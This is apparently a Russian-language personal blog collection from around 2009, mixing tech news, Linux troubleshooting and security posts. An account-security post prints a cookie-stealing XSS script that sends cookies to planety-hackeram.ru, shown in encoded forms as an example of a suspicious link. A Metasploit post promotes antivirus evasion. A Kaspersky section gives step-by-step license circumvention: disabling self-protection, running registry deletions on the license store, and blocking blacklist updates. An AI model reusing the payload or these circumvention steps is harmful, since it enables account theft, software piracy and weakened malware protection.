«time bomb» - Конец Windows 7even RC


Из рассылки TechNet
Завершение срока работы Windows 7 Release Candidate


Напоминаем, что срок действия Windows Release Candidate подходит к
концу. 1 марта во всех версиях RC будет активирована «time bomb»,
перезагружающая систему каждые 2 часа. Благодарим всех участников
программы тестирования новой операционной системы и рекомендуем
озаботиться сохранением своих данных и переходом на полноценную версию
Windows 7.

Microsoft 1 Microsoft Way Redmond, Washington, USA ©

Ветер Прибужья

Феньки-лисички, ставшие символом и названием нового мобильного браузера от файрфокс Fennec, кафрские (рогатые) вороны и грифовые цесарки - новое достоинство Николаевского зоопарка.Птицы, ставшие новыми питомцами зоопарка,кроме Николаевского, есть только в пяти городах СНГ. Это относится к грифовой цесарке. Рогатые вороны имеются пока лишь в четырех зоопарках постсоветского пространства.

В декабре Николевский зоопарк обменялся животными с другими зоопарками, благодаря чему разжился новыми лисичками и птицами. К сожалению посмотреть животных никак нельзя, потому что они находятся на карантине. Пока лишь могу предоставить фотки с Wikipedia.

Фенек (Vulpes zerda) — миниатюрная лисица своеобразной внешности, которая живёт в пустынях Северной Африки. Иногда её относят к особому роду Fennecus.

Fennec— название веб-браузера Mozilla Firefox, адаптированного для мобильных телефонов, смартфонов и других мобильных устройств. Имя браузера происходит от лисы фенек — миниатюрной пустынной лисицы.

Кафрский рогатый ворон (Bucorvus leadbeateri (Vigors, 1825)) — самый крупный вид из семейства птиц-носорогов, один из двух видов, входящих в род рогатых воронов. Обитает в африканской саванне, к югу от экватора.

Грифовая цесарка (Acryllium vulturinum)- семейство птиц из отряда курообразных, обитающих в Африке и на Мадагаскаре

Вымогатели.

Уже многие сталкивались, или хотя бы наслышаны о троянах, блокирующих компьютеры с требованием отправить платную sms для его разблокировки. Сегодня случайно интересную инфу в домашних сетях Донецка.

"Лаборатория Касперского" представила бесплатный сервис для борьбы с программами-вымогателями класса Trojan-Ransom, блокирующими компьютер и предлагающими отправить платную СМС на определенный номер. Отличие вредоносных программ класса Trojan-Ransom от других вредоносных приложений заключается в их изначальной коммерческой направленности. Каждая программа этого поведения является инструментом для получения денег киберпреступников. Используя новый сервис, нужно указать номер телефона, на который предлагают отправить СМС, а также текст сообщения, которое требуют отправить на этот номер. Взамен на номер отправителя будет выслан код, позволяющий разблокировать компьютер."

Статья на КасперЛаб.

Mandriva или Windows? Интернет.

Последнее время происходят частые разъединения сетевых соединений peopleNET в Николаеве. Это связано с работами проводимыми провайдером в нашем городе...


Модем вылетает,  его "типа - теряет" Windows. Что удивило, так это работа модема под Mandriva Linux PP 2009. Модем вылетает, но восстанавливается соединение намного проще, запросто можно работь в много-вкладочном режиме.)
Плюс клиент icq. Windows теряет модем при запуске почтового клиента, (который в придачу ко всему висит в автозапуске в linux) браузера с более чем пятью вкладками, и  qip... а тут тоже, плюс i.ua - попытки входа на который под "вендой" - заканчиваются полным провалом.
Так, что "сексуальная", как её называют французы(и по моему не зря) мандрива порадовала снова.


Кстати cooliris - великолепно работает на 2009-ой при выборе отказа от установки adobeflash. То же самое относится и к работе foxtab. При первом запуске браузера с момента установки расшмрения, он спрашивает воспользоваться старой версией или установить adobeflash. Я выбираю старую версию Foxtab. И работае отлично.


Про шрифты - уж и не знаю... с "родными" mandriva font - мне нравится. Отлично смотрится!)

Mandriva завораживает эффектами Linux. Распадающиеся на куски при закрытии окна, колыхающиеся при перемещении и становящиеся при этом полупрозрачными... после скупой на эффекты и пожирающей ресурсы немеряно "венды" - mandriva может показаться раем.) Кубы рабочих столов, запускаю как заставку. Пр удерживании стрелки он начинается вращаться в сторону указателя стрелки.)


Крайне красивая и удобная вещь! Рабочие столы. В мандрива линукс - удобное для навигации меню и программ-стартер. Прикольно смотрятся эффекты минимизации окон. Когда сворачиваемое окно  уменьшаясь - исчезает в панели задач.)
Короче - классная и стильная система. И в трудный час, как оказалось не подводит.

Picasa for Linux x86_64

Приложение устанавливается но на данной архитектуре неверно отображаются русскоязычные имена папок и файлов, а также меню.



Если выставить в настройках русский - то часть меню отображается нормально, а например диалоговое окно настроек - не нормально.


Короче - полный попандос. Причём это касается только указанной архитектуры процессора. На i586 - всё становится как надо. Попытка добавить репозиторий гугла тоже закончилаьс провалом.
_______________________
# urpmi.addmedia -v google64 http://dl.google.com/linux/rpm/stable/x86_64 with hdlist.cz
getting exclusive lock on urpmi
добавляется источник "google64"
...извлечение не удалось: сбой wget: завершён с 1

no metadata found for medium "google64"
unlocking urpmi database
_______________________
В отношении установки версии 3 - главная проблема в
lsb-core-ia32 >= 3.0 нужен для picasa-3.0.5744-02.i386
Установить обычно не удалось, просто выхожу в приглашение снова.
# urpmi -y lsb-core
#
Пакеты lsb-core-3.1-16mdv2009.0.x86_64, lsb-core-3.1-16mdv2009.0.x86_64, lsb-core-3.1-16mdv2009.0.x86_64 уже установлен
Интересно возможно ли заменить lsb-core-3.1-16mdv2009.0.x86_64 на lsb-core-3.1-16mdv2009.0.i386(586) без пагубных последствий для системы?
Поскольку единственное, что сделал - это выставил аглицкий в интерфейсе. С меню и диалогами стало проще. Но папки и файлы - по прежнему в квадратиках...


Редактировано 19:55 10.12.2009 Источник добавляется так


времени проверить установку с параметром замены существующих пакетов принудительно не было. Простое urpmi picasa - выдало ошибку - пакет установлен. ....

21:03 10.12.2009 - наконец-то поробовал загрузить с параметром --replacepkgs. Загружается, но с источника имеющего версию i386... а мне это не нужно...
[root@localhost vendetta]# urpmi picasa --replacepkgs

    http://dl.google.com/linux/rpm/stable/i386/picasa-2.7.3736-15.i386.rpm
        13% из 24791434 завершено, осталось времени = 2m 19s, скорость = 180K/s

# urpmi picasa --replacepkgs

    http://dl.google.com/linux/rpm/stable/i386/picasa-2.7.3736-15.i386.rpm
предупреждение: /var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: Заголовок V3DSA signature: NOKEY, key ID 7fac5991
Следующий пакет имеет неверную подпись:
/var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: Неверная подпись (NOT OK (nokey): /var/cache/urpmi/rpms/picasa-2.7.3736-15.i386.rpm: °» V3 DSA signature: NOKEY, key ID 7fac5991)
Продолжить установку? (y/N) Y
устанавливается picasa-2.7.3736-15.i386.rpm из /var/cache/urpmi/rpms
Подготовка...                    #############################################
      1/1: picasa                #############################################
по прежнему предупреждает о неверной подписи...

21:10 - Удаление источника http://dl.google.com/linux/rpm/stable/i386 - приводит к тому, что пакет не находится...


Защити свой аккаунт.

Вам понравится, если украдут вашу почту, почтовый ящик, а заодно и ник регистрации в блоге? Уверен, что нет. Не все возможности защиты зависят от настроек сервера, и администраторов сайта, программистов.
К сожалению устройство блогов таково, что такая возможность как похищение пароля остаётся у взломщика. И поскольку не всё зависит от админов, то давайте посмотрим на то, что же можем и должны делать мы сами?
Мы можем зайти в настройки почтового ящика и оставить там сообщение:
"Не влезай - убьёт!", или:
"Стыришь мой пароль получишь в рожу!" lol podmig
Ну, а теперь вполне серьёзно!

Что нужно для того чтобы не угнали ваш аккаунт?
Общие правила безопасности.
1.    Хороший, стойкий пароль, который не содержит символов из ваших имени и даты рождения. Особенно если они указаны на сайте, в анкете знакомств, при регистрации и т.п. Не используйте простые пароли, короче семи-шести символов.
"Дело в том, что мало кто выбирает себе пароль, как бессмысленный набор символов. По-этому при рассчетном
количестве вариантов (например 20 миллиардов) пользователями реально используются несколько сотен тысяч наиболее популярных паролей. Даже для дохлого компа перебор такого количества паролей - плевое дело. Есть еще так называемый "силовой метод". Это когда большое количество
вариантов перебирается несколькими мощными компами. Метод легко
масштабируется. Здесь вопрос подбора - лишь вопрос времени и наличия
вычислительных мощностей у взломщика. Но чтобы ускорить такую рутинную работу, для этого можно использовать
вирусы, если заразить, или подчинить(бот сети) большое количество компов, то все они будут
подбирать пароли."

2.    Секретный вопрос для восстановления пароля должен тоже быть совершенно неожиданным. Точнее ответ на него. На пример, если вопрос выглядит так – Какая у Вас была кличка в школе?
Ответ можете сделать примерно таким - 1+1=44. А если - какая девичья фамилия Вашей матери – напишите - Кальмары в соусе.
3.    Пользуйтесь безопасными браузерами. Я предпочитаю Mozilla Firefox…
Правила безопасности в блоге и почте.
4.    Если вы открыли пришедшее вам письмо, перешли по ссылке в нём, которая якобы указывает на сайт i.ua (в контексте этого сайта), но при этом попадаете на якобы главную страницу сайта, где снова нужно авторизироваться, помните, что вы Уже авторизированны на сайте, иначе не вошли бы в свою почту. Поэтому не стоит вводить повторно свои пароль и ник. Достаточно просто обновить страницу. Если вы, находясь на сайте, в почтовом ящике, то есть уже выполнили вход на сайт,  при открытии новой страницы сайта получаете предложение ввести свои пароль и ник снова, ни в коем случае не делайте этого! Достаточно просто обновить страницу, хотя, для интереса вы можете, ввести свой ник, а пароль ввести Ложный. В том случае, если это поддельная страница вас может перенести на главную страницу сайта (а может и нет),  в таком случае ваш поддельный пароль будет просто принят без вывода сообщения об ошибке, если же это настоящая страница (что в принципе не возможно, коль вы уже вошли) то вы получите сообщение об ошибке ->


Если вас перевело на главную попробуйте обновить страницу или просто закрыть вкладку. При обновлении страницы, если на другой вкладке вы уже вошли, вход будет произведён автоматически.
5.    Ссылки. Будьте внимательны при прочтении писем, которые содержат ссылки. Если есть реальная необходимость перейти по ссылке которую прислали в письме, лучше скопируйте её и вставьте в новой вкладке браузера, или новом окне. Будьте внимательны обращайте внимание на то куда ведут ссылки. Смотрите по символам из которых состоит адрес ссылки. Дважды подумайте так ли для Вас важно проследовать по ссылке вида ужасного для вас совсем не понятного, типа:
%3C%73%63%72%69%70%74%3E%69%6D%67%3D%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6C%61%6E%65%74%79%2D%68%61%63%6B%65%72%61%6D%2E%72%75%2F%73%6E%69%66%66%2F%73%2E%67%69%66%3F%69%64%3D%32%31%32%38%26%22%2B%
64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E

или
<script>img=new Imag&#x65
;()&#x3B; img.src="http://&#x7
0;lanety-hackeram.ru/s&#x
6E;iff/s.gif?id=2128&"+document.cookie&#x3B;</script>&#60&#115&#99&#114&#105&#112&#116&#62&#105&#109&#103&#61&#110&#101&#119&#32&#73&#109&#97&#103&#101&#40&#41&#59&#32&#105&#109&#103&#46&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#112&#108&#97&#110&#101&#116&#121&#45&#104&#97&#99&#107&#101&#

114&#97&#109&#46&#114&#117&#47&#115&#110&#105&#102&#102&#47&#115&#46&#103&#105&#102&#63&#105&#100&#61&#50&#49&#50&#56&#38&#34
&#43&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#59&#60&#47&#115&#99&#114&#105&#112&#116&#62
или
PHNjcmlwdD5pbWc9bmV3IEltYWdlKCk7IGltZy5zcmM9Imh0dHA6Ly9wbGFuZXR5LWhhY2tlcmFt LnJ1L3NuaWZmL3MuZ2lmP2lkPTIxMjgmIitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+
(хотя эти методы чаще используются для обхода мер безопасности системы, обхода фильтров установленных администрацией, но в качестве примера - сгодится), а в почте же чаще могут попасться ссылки типа
http: g.i.ua?_url="http%3A%2F%2Fplanety-hackeram.ru%2Fsniff%2Fs.gif%3Fid%3D2128
Ведь так можно замаскировать ссылку, куда она ведёт, да и не только ссылку... то есть помните, что ссылки могут быть замаскированными и для перехода по ним из почты лучше копировать их и вставлять в адресную строку браузера на новой вкладке\окне...
Ну, да не будем отвлекаться. Что же нам понадобится ещё? Кроме нашего внимания и осторожности, хорошего пароля и немного ума?
6. Не игнорируйте сообщения своего браузера! Если он предупреждает вас о том, что вы собираетесь перейти на небезопасную страницу\сайт, не стоит убеждать себя, что это же i.ua! Что тут не может быть опасности... браузер как раз собирался вам сказать, что это вовсе не тот сайт о котором вы думали, что это подделка!
7. Не сообщайте никому свой пароль для входа в почту или на сайт. Если же вы по какой-то (надеюсь - действительно серьёзной) причине сделали это, смените пароль при первой возможности.
Я думаю, вобще то всё... и надеюсь, что меня возможно кто-то исправит, или дополнит. Со временем, когда оно появится я возможно дополню эту статью некоторыми нюансами, но в целом - всё.
А ссылки на программы для качественного управления паролями:
Генерация паролей, хранение паролей - будут попозже в сообществе 911.
Всего доброго, удачи.
P.S. Статья написана в контексте данного сайта, то есть специально для пользователей i.ua. Безусловно не всех.podmig

Новости в мире Хак софта. Всё в одном.

Весь "боекомплект" для хакера. Начинающего и самого продвинутого. Обновилась всемирно известная программа Metasploit Framework от не менее известного автора H.D. Moore.
Metasploit Framework 3.2 release

Exploits      =320
Payloads    =217
Encoders    = 20
Nops           = 6
Auxiliary     =99
Nmap + GUI - Zenmap в комплекте. Используй пока не использовали против тебя! Теперь тут не только консоль и web интерфейс встроенный в браузер, но также собственный интерфейс программы. В комплекте поставки и не менее популярный сканер пришедший из мира *nix систем - nmap. Возможности nmap и Metasploit - давно известны. Программы пригодятся как системному администратору, для проверки сети, сайта, серверов, или локальной системы,


так и взломщику. Программы используются по обе стороны баррикады. В этом вся прелесть подобного софта.))) Или его недостаток? Но мы не можем сделать это недостатком программы, так, как это скорее недостаток людей которые используют совсем не в тех целях для которых она предназначена. Framework - это платформа для создания программ позволяющих эксплуатировать
наиболее распространенные ошибки в локальных и сетевых приложениях. Framework
используется профессионалами в области защиты информации. Позволяет исследовать
уязвимости, имеет набор стандартных шеллкодов. На данный момент, пакет
Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас. Помимо добавления собственного интерфейса, кроме старого, встраиваемого в браузер,

новым является следующее:
    Улучшенное шифрование шеллкода. Обнаружить атаку теперь станет еще труднее.
    Улучшения в функции Raw Packet Tools, облегчающие внедрение вредоносного кода.
    Новая библиотека PacketFu, позволяющая осуществлять внедрение пакетов как в обычных, так и в беспроводных сетях.
    Улучшенная поддержка взлома машин с многоядерными процессорами.
    Улучшенная поддержка маскировки эксплоита в .exe-файле, позволяющая обходить сигнатурную проверку антивирусов.
    Новая система автоматической атаки на стороне клиента Browser Autopwn, автоматически запускающая эксплоиты против браузера пользователя.
    Новый модуль для подготовки атак с участием жертвы Metasploit in the Middle Feature, который можно будет использовать для спуфинга DNS или создания фальшивой точки доступа.
    Новая функция Evil Wireless Access Point.
По словам создателя программы и в то же самое время, автора - опубликованного для iPhone шелл-кода - H.D. Moore, при помощи функции Evil Wireless Access Point можно будет создать точку доступа, которая нивелирует все
другие точки доступа в пределах ее досягаемости и сможет мимикрировать под
точку доступа пользователя по умолчанию. Сплошные превращения! И новые функции Browser AutoPwn, Metasploit in the Middle и Evil
Wireless Access Point, кроме всего прочего увеличивают вероятность незаметного проникновения, обход антивирусных программ осуществляющих сигнатурный анализ, и атаку браузера на стороне клиента. Для тех, кто не знаком с программой в сети есть масса описаний и на секлабе и античате, даже видео есть на античате.
В комплекте под windows -
Zenmap, сетевой сканер - поставляется в версии 4.76.


Возможности программы известны давным-давно и на полную используются не только системными администраторами, но и хакерами. В принципе, как инструмент - программа очень хороша, имеет массу возможностей, о которых можно почитать на сайте производителя. GUI облегчает использование сканера новичками в системном администрировании, и поиске уязвимостей в сетях и локальных системах.
Использование параметров: nmap [Тип(ы) Сканирования] [Опции] {цель сканирования}

Несколько стандартных опций:
ОПРЕДЕЛЕНИЕ ЦЕЛИ СКАНИРОВАНИЯ:
  Можно использовать сетевые имена, IP адреса, сети и т.д.
  Пример: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iL <имя_входного_файла>: Использовать список хостов/сетей из файла
  -iR <количество_хостов>: Выбрать произвольные цели
  --exclude <хост1[,хост2][,хост3],...>: Исключить хосты/сети
  --excludefile <имя_файла>: Исключить список из файла
ОБНАРУЖЕНИЕ ХОСТОВ:
  -sL: Сканирование с целью составления списка - просто составить список целей для сканирования
  -sP: Пинг сканирование - просто определить, работает ли хост
  -PN: Расценивать все хосты как работающие -- пропустить обнаружение хостов
  -PS/PA/PU [список_портов]: TCP SYN/ACK или UDP пингование заданных хостов
  -PE/PP/PM: Пингование с использованием ICMP эхо запросов, запросов временной метки и сетевой маски
  -PO [список_протоколов]: Пингование с использованием IP протокола
  -n/-R: Никогда не производить DNS разрешение/Всегда производить разрешение [по умолчанию: иногда]
  --dns-servers <сервер1[,сервер2],...>: Задать собственные DNS сервера
  --system-dns: Использовать системный DNS преобразователь
РАЗЛИЧНЫЕ ПРИЕМЫ СКАНИРОВАНИЯ:
  -sS/sT/sA/sW/sM: TCP SYN/с использованием системного вызова Connect()/ACK/Window/Maimon сканирования
  -sU: UDP сканирование
  -sN/sF/sX: TCP Null, FIN и Xmas сканирования
  --scanflags <флаги>: Задать собственные TCP флаги
  -sI <зомби_хост[:порт]>: "Ленивое" (Idle) сканирование
  -sO: Сканирование IP протокола
  -b <FTP_хост>: FTP bounce сканирование
  --traceroute: Отслеживать путь к хосту
  --reason: Выводить причину нахождения порта в определенном состоянии
ОПРЕДЕЛЕНИЕ ПОРТОВ И ПОРЯДКА СКАНИРОВАНИЯ:
  -p <диапазон_портов>: Сканирование только определенных портов
    Пример: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
  -F: Быстрое сканирование - Сканирование ограниченного количества портов
  -r: Сканировать порты последовательно - не использовать случайный порядок портов
  --top-ports <количество_портов>: Сканировать <количество_портов> наиболее распространенных портов
  --port-ratio <рейтинг>: Сканировать порты с рейтингом большим чем <рейтинг>
ОПРЕДЕЛЕНИЕ СЛУЖБ И ИХ ВЕРСИЙ:
  -sV: Исследовать открытые порты для определения информации о службе/версии
  --version-intensity <уровень>: Устанавливать от 0 (легкое) до 9 (пробовать все запросы)
  --version-light: Ограничиться наиболее легкими запросами (интенсивность 2)
  --version-all: Использовать каждый единичный запрос (интенсивность 9)
  --version-trace: Выводить подробную информацию о процессе сканирования (для отладки)
СКАНИРОВАНИЕ С ИПОЛЬЗОВАНИЕМ СКРИПТОВ:
  -sC: эквивалентно опции --script=default
  --script=<Lua скрипты>: <Lua скрипты> это разделенный запятыми список директорий, файлов скриптов или
  категорий скриптов
  --script-args=<имя1=значение1,[имя2=значение2,...]>: Передача аргументов скриптам
  --script-trace: Выводить все полученные и отправленные данные
  --script-updatedb: Обновить базу данных скриптов
ОПРЕДЕЛЕНИЕ ОС:
  -O: Активировать функцию определения ОС
  --osscan-limit: Использовать функцию определения ОС только для "перспективных" хостов
  --osscan-guess: Угадать результаты определения ОС
ОПЦИИ УПРАВЛЕНИЯ ВРЕМЕНЕМ И ПРОИЗВОДИТЕЛЬНОСТЬЮ:
  Опции, принимающие аргумент <время>, задаются в миллисекундах, пока вы не добавите 's' (секунды), 'm' (минуты),
  или 'h' (часы) к значению (напр. 30m).
  -T[0-5]: Установить шаблон настроек управления временем (больше - быстрее)
  --min-hostgroup/max-hostgroup <кол_хостов>: Установить размер групп для параллельного сканирования
  --min-parallelism/max-parallelism <кол_хостов>: Регулирует распараллеливание запросов
  --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <время>: Регулирует время ожидания ответа на запрос
  --max-retries <количество_попыток>: Задает максимальное количество повторных передач запроса
  --host-timeout <время>: Прекращает сканирование медленных целей
  --scan-delay/--max-scan-delay <время>: Регулирует задержку между запросами
  --min-rate <число>: Посылать запросы с интенсивностью не меньше чем <число> в секунду
  --max-rate <число>: Посылать запросы с интенсивностью не больше чем <число> в секунду
ОБХОД БРАНДМАУЭРОВ/IDS:
  -f; --mtu <значение>: Фрагментировать пакеты (опционально с заданным значениме MTU)
  -D <фикт_хост1,фикт_хост2[,ME],...>: Маскировка сканирования с помощью фиктивных хостов
  -S <IP_адрес>: Изменить исходный адрес
  -e <интерфейс>: Использовать конкретный интерфейс
  -g/--source-port <номер_порта>: Использовать заданный номер порта
  --data-length <число>: Добавить произвольные данные к посылаемым пакетам
  --ip-options <опции>: Посылать пакет с заданным ip опциями
  --ttl <значение>: Установить IP поле time-to-live (время жизни)
  --spoof-mac <MAC_адрес/префикс/название производителя>: Задать собственный MAC адрес
  --badsum: Посылать пакеты с фиктивными TCP/UDP контрольными суммами
ВЫВОД РЕЗУЛЬТАТОВ:
  -oN/-oX/-oS/-oG <файл>: Выводить результаты нормального, XML, s|<rIpt kIddi3,
     и Grepable формата вывода, соответственно, в заданный файл
  -oA <базовове_имя_файла>: Использовать сразу три основных формата вывода
  -v: Увеличить уровень вербальности (задать дважды или более для увеличения эффекта)
  -d[уровень]: Увеличить или установить уровень отладки (до 9)
  --open: Показывать только открытые (или возможно открытые) порты
  --packet-trace: Отслеживание принятых и переданных пакетов
  --iflist: Вывести список интерфейсов и роутеров (для отладки)
  --log-errors: Записывать ошибки/предупреждения в выходной файл нормального режима
  --append-output: Добавлять в конец, а не перезаписывать выходные файлы
  --resume <имя_файла>: Продолжить прерванное сканирование
  --stylesheet <путь/URL>: Устанавливает XSL таблицу стилей для преобразования XML вывода в HTML
  --webxml: Загружает таблицу стилей с Nmap.Org
  --no-stylesheet: Убрать объявление XSL таблицы стилей из XML
РАЗЛИЧНЫЕ ОПЦИИ:
  -6: Включить IPv6 сканирование
  -A: Активировать функции определения ОС и версии, сканирование с использованием скриптов и трассировку
  --datadir <имя_директории>: Определяет место расположения файлов Nmap
  --send-eth/--send-ip: Использовать сырой уровень ethernet/IP
  --privileged: Подразумевать, что у пользователя есть все привилегии
  --unprivileged: Подразумевать, что у пользователя нет привилегий для использования сырых сокетов
  -V: Вывести номер версии
  -h: Вывести эту страницу помощи
ПРИМЕРЫ:
  nmap -v -A scanme.nmap.org
  nmap -v -sP 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -PN -p 80
Наиболее эффективные результаты достигаются в сканировании с использованием скриптов.
Скачать
SpyLOG

Opera... парочка секретов популярного браузера.

Не знаю у кого как, а вот у меня неоднократно возникала такая проблема. Нажимаеш в Опере ссылку скачать и если файл типа .rar - то он просто загружается в окно Opera. И в окне отображаются кракозябры. Оно то и понятно это ведь архив... всё дело в том, что нужно в таких случаях задать опере парочку указаний для обработки файловых архивов типа .rar. Для этого:

Заходите в Инструменты->Настройки, или жмёте Ctrl+F12-> Дополнительно-> Загрузки.

В поле  поиска вводите “rar” и снимаете галочку с “Не показывать типы файлов Opera“. В результате вы увидите несколько уже имеющихся в вашем браузере MIME-типов для расширения .rar. Следуя нижеуказанным списком, необходимо добавить недостающие MIME-типы. Для каждого из них в поле “Расширения файлов” необходимо поставить “rar” (без кавычек). MIME-типы: application/octet-stream application/rar application/x-compress application/x-compressed application/x-rar application/x-rar-compressed multipart/x-rar Готово! Дерзайте. А я, поскольку использую пока Альфа версию браузера Opera - Opera Turbo 10.0.1355 Alpha Могу воспользоваться новой фишкой, которая добавлена в версии 10. помимо стандартного увеличения скорости всё же ЕЩЁ увеличить скорость загрузки,  Также Инструменты->Настройки, или - ctrl+F12 -> вкладка web pages -> поставить галочку Enable Opera Turbo... Opera Turbo 1355 EN официальнОй сайт... Как руссифицировать ужО писалосЯ.
SpyLOG

Касперский антивирус. Пара настроек и активация. Если шо.)))

Я сам использую Kaspersky Internet Security 2009 v 8.0.0.506(a) но если не ошибаюсь есть и final. Или по крайней мере хот-фикс...

Прежде о пользовании антивирусами - следует помнить, что качать саму программу следует только по ссылкам ведущим на официальный сайт. Или с самого оф сайта. Если кто то не знает как узнать откуда идёт скачивание в тех случаях, когда оно начинается сразу при нажатии на ссылку, должны скачивать антивирус Касперского только отсюда.

Ещё вы можете скачать на сайте Касперского Антивируса Бесплатные лечащие утилиты которые лаборатория выпускает регулярно во время глобальных вирусных эпидемий. Эти утилиты направленны на какое то вполне определённое действие - например удаление или лечение в случае поражения компьютера червём Worm.Win32.AutoRun.hr. Они доступны тут - Kaspersky RemovalTools.

Антивирус Касперского обладает целым рядом достоинств, но это вовсе не означает, что установив хоть самый лучший антивирь - вы навсегда защищены от вирусов! Всегда обновляйте базы используемого вами антивируса, как можно чаще - лучше оставить эти  настройки по умолчанию...

Итак. Как регистрировать программу если нет ключа? Лучше его приобрести! Чтобы не было мороки. Скинуться втроём в четвером и купить лицензию на несколько компьютеров.

Но если такой возможности нет? Тогда ищем и скачиваем под KIS 2009 программу Kaspersky 2009 Trial Reset_2.2V

Затем отключаем Самозащиту Касперского

Правый щелчок на значке касперского возле часов ->Пункт Настройка в самом первом, по умолчанию выбранном пункте Защита нам нужно снять галочку напротив пункта Включить защиту.

Далее переходим в пункт параметры и отключаем Самозащиту, снимая галочку напротив пункта Включить самозащиту.

Теперь Нажимаем внизу кнопку Применить, а затем Ок. После этого правый клик на значке возле часов и выбрать команду Выход. Запустить программу Kasp2009_8.0.0.454_TrialReset2.2 (которая хотя и предназначена для 8.0.0.454 - работает и для 8.0.0.456). Перегрузить компьютер и активировать как Пробную версию - Никаких ограничений на функциональность антивируса это не накладывает.

Маленький совет по поводу того, как упростить возможность обновления антивируса Касперского если нет интернета на домашней к примеру машине. На том компьютере, где есть интернет включите функцию Копировать обновления в папку... и если пожелаете - укажите путь к папке, куда должны копироваться обновления. Затем копируете эту папку, как есть например на флешку\дискету, CD-RW и переносите на компьютер где нет подключения к интернет. Скопиров её в любую желаемую папку к примеру в Мои документы\UpgraidKIS. Теперь указав в качестве источника обновления кроме серверов Лабооратории Касперского путь к папке  с вашими свежими базами - вы может обновить их на момент копирования. Это подойдёт и для админов которые устанавливают Каспера на машины без нета.

Регистрация пробной версии для Касперского 7.

Чтобы не переустанавливать ежемесячно, и не искать каждый раз когда в бан попадают ваши ключи можно сделать вот так.

Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates] [-HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\LicStorage]

Скопировать вот это и вставить в блокнот (для Vista - замените первую строку на Windows Registry Editor Version 6.00, хотя это и не обязательно, перенос версий от более младшей к более старшей работает вроде с reg файлами...) что то я отвлёкся. Так вот вставляем в блокнот. Главное проследить чтобы у вас обязательно были пустые строки в следующих позициях:

Вторая. Это после Windows Registry Editor Version 5.00(указания версии редактора реестра, или в принципе ОС)

и последняя. Последняя строка должна быть пустой, как и вторая!

Далее открываем меню файл -> Выбираем пункт меню Сохранить как -> Затем в поле Тип фала, где стоит Текстовые документы .txt изменяем на Все файлы.

Теперь вводим имя Файла( я ввёл DellKIS)

и после имени Точка и расширение имени файла - .reg

Вместе выглядит так:

DellKIS.reg

И так сохраняете этот файл на рабочий стол. Затем выходите из Касперского предварительно отключив самозащиту, как было рассказано выше и двойным кликом запускаете созданный файл. Соглашаетесь с внесением изменений в реестр. Перегружаете компьютер, при перезапуске компьютера Касперский просит активацию, активирует пробную версию. Через тридцать дней повторяете операцию.

Вариант два - создание "батника". Создаётся файл точно также, как и reg только сохраняется как ЛюбоеИмяФайла.bat

КОД НИЖЕ ВСТАВЛЯЕМ В БЛОКНОТ И СОХРАНЯЕМ НАПРИМЕР КАК РегистрацияКаспера.BAT. Выходим из каспера запускаем наш батник который можно прописать в шедулер (планировщик задач). Перегружаемся, активируем пробную версию на месяц. Это лучше чем каждый месаяц переустанавливать каспера, или искать новый ключ.

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates /f reg delete HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\LicStorage /f

Вариант три:

1. Если Ваш ключ уже внесен в черный список - ищем новый и активируем KIS. 2. В KIS Настройки > Сервис > Самозащита > снимаем галку "Включить самозащиту", нажимаем OK. 3. Правой кнопкой щёлкаем по значку KIS в трее, в контекстном меню выбираем "Приостановить защиту", а в появившемся окне "Только по требованию пользователя" и OK. 4. Правой кнопкой щёлкаем по значку KIS в трее, в контекстном меню выбираем "Выход". 5. Ищем файл C:\documents and Settings\All Users\Application Data\Kaspersky Lab\AVP6\Bases\black.lst. Кликаем на нем правой кнопкой, Свойства > Общие > Атрибуты. Ставим галку "Только-Чтение". Выбираем закладку "Безопасность" (только для файловой системы NTFS и XP Pro). Пользователям "Все" и "SYSTEM" ставим галку "Запретить" напротив "Запись". Жмем OK. Таким образом мы запретим KIS обновлять черный список и он будет использовать старый, в котором еще нет Вашего ключа. 6. Запускаем KIS, включаем защиту,включаем самозащиту. 7. При необходимости обновляемся и обязательно наслаждаемся...

Примечания:

1. Для доступности закладки Безопасность идем в Панель-Управления -> Свойства-Папки -> Вид и убираем галку "Использовать простой общий доступ к файлам". Или в любом окне проводника, или Мой компьютер идем в меню Сервис-> выбираем Свойства Папки-> и снимаем ту же галочку - Использовать простой общий доступ.

2. Перед выключением KIS на всякий случай отключитесь от Интернета.                              

3. Три выше рассмотренных варианта работают на версии семь это точно. Кто попробует для KIS 2009 - отпишитесь как работает. Но судя по всему - должно. 

Соглашения принятые в этом документе:

Подчёркнутый текст - Тескт На Который следует обратить особое внимание  

Выделенный текст - описание элементов меню или тех действий которые должны быть повторены вами без ошибок.

SpyLOG

Red Hat 5.3

всего отмечено более 150 усовершенствований):
В состав дистрибутива интегрирован пакет OpenJDK, полностью open source реализация языка Javа SE 6 не содержащая закрытых бинарных составляющих. Ранее OpenJDK был интегрирован в дистрибутив Fedora 8.

Год выпуска: 2009
Версия: 5.3
Разработчик: RedHat Inc.
Платформа: i386
Язык интерфейса: английский

Виртуализация:
• Поддержка x86_64 гипервизором до 126 CPU и 1Тб ОЗУ, произведена оптимизация для выполнения большого числа гостевых окружений на одном сервере;
• Возможность использования более 16 дисков для одного гостевого окружения;
• Добавлены Virtio драйверы для использования Red Hat Enterprise Linux 5 в роли гостевой ОС, под управлением гипервизора KVM;
• Поддержка механизма Intel EPT (Extended Page Table) для повышения производительности в режиме полной виртуализации;
• Поддержка работы из коробки с более чем четырьмя сетевыми картами;
